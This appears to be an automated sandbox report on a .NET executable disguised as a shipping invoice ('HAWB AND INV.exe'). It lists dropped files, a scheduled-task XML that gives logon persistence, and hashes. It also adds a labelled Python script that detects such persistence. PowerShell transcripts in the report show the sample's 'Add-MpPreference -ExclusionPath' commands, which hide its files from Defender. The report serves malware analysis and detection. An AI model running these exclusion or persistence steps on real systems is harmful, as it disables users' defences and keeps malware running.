                                                                    Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):22300
                                                                    Entropy (8bit):5.601959909768602
                                                                    Encrypted:false
                                                                    SSDEEP:384:+tCDX0FD4MBB30CCancSBKn+ultIo867Y9gpSJUeRq1BMrmihZOAV7WTQyb64I+i:3MBB3tc4K+ultp8+pXepthTS/g
                                                                    MD5:241BCBB5F7AD903FBBCC8E06DD3DBEA8
                                                                    SHA1:96CF72B66B02F0D23AAADC975EA8433CA6B12497
                                                                    SHA-256:CAF362C288605DAB596260E52669FDC3515FEF5913EEB1ABF18AAB976098B2FA
                                                                    SHA-512:4557A6D914573A8EB8172289153D159FCB3856674E93ACC1DA0A9968175CCBC94ACC40B678A595FB639F6F4F28EBD19395DEBD4EC2DBADB94365B5C063A56E52
                                                                    Malicious:false
                                                                    Preview: @...e.................................<.4............@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_452t2rgn.y0w.psm1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ci5ca1ps.eac.psm1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kktv134m.r1n.ps1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4og0hre.avf.ps1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qa3iixpe.2p0.ps1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whb0pjwq.qxr.psm1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\tmp9D41.tmp
                                                                    Process:C:\Users\user\Desktop\HAWB AND INV.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1656
                                                                    Entropy (8bit):5.16428555186853
                                                                    Encrypted:false
                                                                    SSDEEP:24:2dH4+SEqC/S7h2ulNMFp2O/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB3Jtn:cbha7JlNQV/rydbz9I3YODOLNdq31
                                                                    MD5:04A6B80210066CDF78CC777D7077AC7B
                                                                    SHA1:DC1B95866C360381A716ED386EA0FF326052D00E
                                                                    SHA-256:EA7625AEF7C946221703A7714B8353E6AF13EA601AFDCC9DCA2410DF46AF1B12
                                                                    SHA-512:E4B574E3E660E59CCC510644669909A1C2FF0C3B1EA32BB3F7580144A3240D80AE2E8D587CDA9ADA7B25B5364B7B5E9601479660211094C732F744899A6E1B44
                                                                    Malicious:true
Preview (CRLF line breaks restored; the preview is cut off at "<StartWhenAvail"):
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>computer\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>computer\user</UserId>
    </LogonTrigger>
    <RegistrationTrigger>
      <Enabled>false</Enabled>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>computer\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvail
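The dropped tmp9D41.tmp is a Task Scheduler task definition, the format that schtasks /create /xml consumes. The following is an added example, not part of the Joe Sandbox report, that parses such a definition and extracts the persistence traits an analyst checks first: an enabled LogonTrigger, a LeastPrivilege run level (registrable by a standard user without a UAC prompt), and an action that executes from a user-writable directory. The preview above stops before the Actions element, so the embedded sample carries a hypothetical Exec command (C:\Users\user\AppData\Roaming\payload.exe); that path is an assumption for illustration and the report does not show what the real task executes. The example also handles a quirk visible in the report: the declaration claims UTF-16 while the file type is ASCII, so the declaration is dropped before parsing.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Path fragments a standard user can write to. A task whose action lives here
# is the classic user-level persistence pattern (no admin rights needed).
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")

# Constructed sample: the elements visible in the tmp9D41.tmp preview above,
# plus a HYPOTHETICAL <Actions> block (the preview stops before it; the real
# command is not shown in the report).
SAMPLE_TASK_XML = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>computer\\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>computer\\user</UserId>
    </LogonTrigger>
    <RegistrationTrigger>
      <Enabled>false</Enabled>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>computer\\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <AllowHardTerminate>false</AllowHardTerminate>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\user\\AppData\\Roaming\\payload.exe</Command>
    </Exec>
  </Actions>
</Task>
"""


def parse_task(xml_text: str) -> dict:
    """Extract the fields that matter for a persistence verdict."""
    # The declaration claims UTF-16, but the dropped file is plain ASCII (see
    # File Type above). Drop the declaration and parse the text we actually have.
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text, count=1)
    root = ET.fromstring(body)

    def text(path: str) -> str:
        el = root.find(path, NS)
        return (el.text or "").strip() if el is not None else ""

    enabled_triggers = []
    triggers = root.find("t:Triggers", NS)
    if triggers is not None:
        for trig in triggers:
            # A trigger without an <Enabled> element is enabled by default.
            if trig.findtext("t:Enabled", "true", NS).strip().lower() != "false":
                enabled_triggers.append(trig.tag.split("}", 1)[1])

    commands = [
        (ex.findtext("t:Command", "", NS).strip(), ex.findtext("t:Arguments", "", NS).strip())
        for ex in root.findall("t:Actions/t:Exec", NS)
    ]
    return {
        "author": text("t:RegistrationInfo/t:Author"),
        "date": text("t:RegistrationInfo/t:Date"),
        "run_level": text("t:Principals/t:Principal/t:RunLevel"),
        "logon_type": text("t:Principals/t:Principal/t:LogonType"),
        "enabled_triggers": enabled_triggers,
        "commands": commands,
    }


def persistence_findings(task: dict) -> list:
    """Human-readable reasons this task looks like user-level persistence."""
    findings = []
    if "LogonTrigger" in task["enabled_triggers"]:
        findings.append("enabled LogonTrigger: re-executes at every interactive logon")
    if task["run_level"] == "LeastPrivilege":
        findings.append("RunLevel LeastPrivilege: registrable by a standard user, no UAC prompt")
    for cmd, args in task["commands"]:
        if any(marker in cmd.lower() for marker in USER_WRITABLE):
            findings.append(f"action runs from a user-writable path: {cmd} {args}".rstrip())
    if not task["commands"]:
        findings.append("no <Actions> element: task definition is incomplete")
    # RegistrationInfo/Date is free text supplied by whoever wrote the XML; it
    # is reported for context but cannot be used to date the registration.
    return findings


if __name__ == "__main__":
    info = parse_task(SAMPLE_TASK_XML)
    print(f"author={info['author']} claimed_date={info['date']}")
    for line in persistence_findings(info):
        print(" -", line)
```

The 2014 value in RegistrationInfo/Date is a case in point: it is whatever string the author embedded in the XML, so it says nothing about when the task was registered on the analysis machine.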
                                                                    C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe
                                                                    Process:C:\Users\user\Desktop\HAWB AND INV.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):741376
                                                                    Entropy (8bit):7.926075846118889
                                                                    Encrypted:false
                                                                    SSDEEP:12288:vFAPrYNczrMFJxdNkJ41cx7acIXBFwbk2ldYaZPCwdwfPyfK8vW6M+:vFAjYysyCcGTqnCfPwK8vnt
                                                                    MD5:42662765A94CE5ECE11529509F937711
                                                                    SHA1:DA57DD4C137C47FC9B906CAAF067C6ED13FA2DA6
                                                                    SHA-256:2138325DD5E2825EE4086187A944AF336476B0327E1DDAE7563BB24523836E08
                                                                    SHA-512:101D7BB5F778E779133F005C801FA26CF1BC147FED9F2774808526C50B3AE8E12863BC7EE3DFB060153D4B0B3A5EF66F357E44D477E1558060FE54DF990B4B95
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P..<..........~[... ...`....@.. ....................................@.................................,[..O....`............................................................................... ............... ..H............text....;... ...<.................. ..`.rsrc........`.......>..............@..@.reloc...............N..............@..B................`[......H...........P...........\....<...........................................0............(!...(".........(.....o#....*.....................($......(%......(&......('......((....*N..(....o`...()....*&..(*....*.s+........s,........s-........s.........s/........*....0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0...........~....o3....+..*.0...........~....o4....+..*.0..<........~.....(5.....,!r...p.....(6...o7...s8............~.....+..*.0......
                                                                    C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe:Zone.Identifier
                                                                    Process:C:\Users\user\Desktop\HAWB AND INV.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:false
                                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                                    C:\Users\user\Documents\20210503\PowerShell_transcript.760639.DjF4q4v1.20210503145231.txt
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):5823
                                                                    Entropy (8bit):5.383418810910059
                                                                    Encrypted:false
                                                                    SSDEEP:96:BZmTL7NmqDo1ZFZVTL7NmqDo1Z268ijZ5TL7NmqDo1ZlTyyOZp:I
                                                                    MD5:93129E478DEEEC2478437A8363A38EA4
                                                                    SHA1:A1D28FA135CCBA1843AAF0CD815C7F13D23D11CE
                                                                    SHA-256:F2DC8F1B35EDB24FAC6D6FF9FA7098630095C73D6AF50E266403E5F7067259B4
                                                                    SHA-512:69FB157B4DF97B16645CE833E992122FEF2B1F6881BB090DB904236279E6614B85C39D8962424EB9C33EF2D3FBF242322AA997B7762824BCB5DB82EF99B46BF4
                                                                    Malicious:false
                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210503145256..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 760639 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe..Process ID: 4592..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210503145257..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe..**********************..Windows PowerShell transcript start..Start time: 20210503145745..Username: computer\user..RunAs User: DES
                                                                    C:\Users\user\Documents\20210503\PowerShell_transcript.760639.TlWWST52.20210503145228.txt
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):5823
                                                                    Entropy (8bit):5.376422136318294
                                                                    Encrypted:false
                                                                    SSDEEP:96:BZxTL7NJqDo1ZYZBTL7NJqDo1Zz68ijZNTL7NJqDo1ZFTyylZe:S
                                                                    MD5:5494E173E7978530BD8CE47B4FFD2F6F
                                                                    SHA1:98537F033C26E27190C1140D5F81C30D4B9BA46F
                                                                    SHA-256:583B8CDC55F3E5604E9455BC869C28E0A27C53D1269DB84AFC380E033E0F0F23
                                                                    SHA-512:54F090846A3633B2DAA570A0619DDA278C3CF77518123EC11AB558903A07BE3119D862E994FE3161DEC45B62FBE6E7EEB19875BE48FF43BB4E60ADA21C9C7B0A
                                                                    Malicious:false
                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210503145253..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 760639 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe..Process ID: 7020..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210503145254..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe..**********************..Windows PowerShell transcript start..Start time: 20210503150325..Username: computer\user..RunAs User: DES
                                                                    C:\Users\user\Documents\20210503\PowerShell_transcript.760639.loHpl5Ui.20210503145226.txt
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):3488
                                                                    Entropy (8bit):5.3223569299956495
                                                                    Encrypted:false
                                                                    SSDEEP:96:BZNTL7NAqDo1ZG2ZRTL7NAqDo1ZGqaf0cf0cf03Zw:6rrR
                                                                    MD5:223BAC110AB9E04C3C2F1CE42C060EB9
                                                                    SHA1:0B87633A2276344A3CBE4542D80CDA52E0C40656
                                                                    SHA-256:DDA355E36125BD1DFEE7FE3280BE85A0DBA31EB7048D1637856DF32BF9907223
                                                                    SHA-512:688672FDB2F5F64CEF935D12795C633CA3B93EF800AD8ED2E4529A5C8600FC7A239AEF085B9DB8E3743FB49FEC59DC92CCC29AAF51E1C734C9646176DC7E86F1
                                                                    Malicious:false
                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210503145248..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 760639 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\HAWB AND INV.exe..Process ID: 6932..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210503145249..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\HAWB AND INV.exe..**********************..Command start time: 20210503145543..**********************..PS>TerminatingError(Add-MpPreference): "A positional parameter cannot

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.926075846118889
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    File name:HAWB AND INV.exe
                                                                    File size:741376
                                                                    MD5:42662765a94ce5ece11529509f937711
                                                                    SHA1:da57dd4c137c47fc9b906caaf067c6ed13fa2da6
                                                                    SHA256:2138325dd5e2825ee4086187a944af336476b0327e1ddae7563bb24523836e08
                                                                    SHA512:101d7bb5f778e779133f005c801fa26cf1bc147fed9f2774808526c50b3ae8e12863bc7ee3dfb060153d4b0b3a5ef66f357e44d477e1558060fe54df990b4b95
                                                                    SSDEEP:12288:vFAPrYNczrMFJxdNkJ41cx7acIXBFwbk2ldYaZPCwdwfPyfK8vW6M+:vFAjYysyCcGTqnCfPwK8vnt
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P..<..........~[... ...`....@.. ....................................@................................

                                                                    File Icon

                                                                    Icon Hash:00828e8e8686b000

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x4b5b7e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                    Time Stamp:0x608FAFA4 [Mon May 3 08:09:08 2021 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:v4.0.30319
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb5b2c          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xb6000          0xeb8         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xb8000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                    Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0xb3b84       0xb3c00   False     0.938279620132   data       7.93407065965   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0xb6000          0xeb8         0x1000    False     0.375732421875   data       4.76936310613   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xb8000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

Name         RVA      Size   Type                                                                            Language  Country
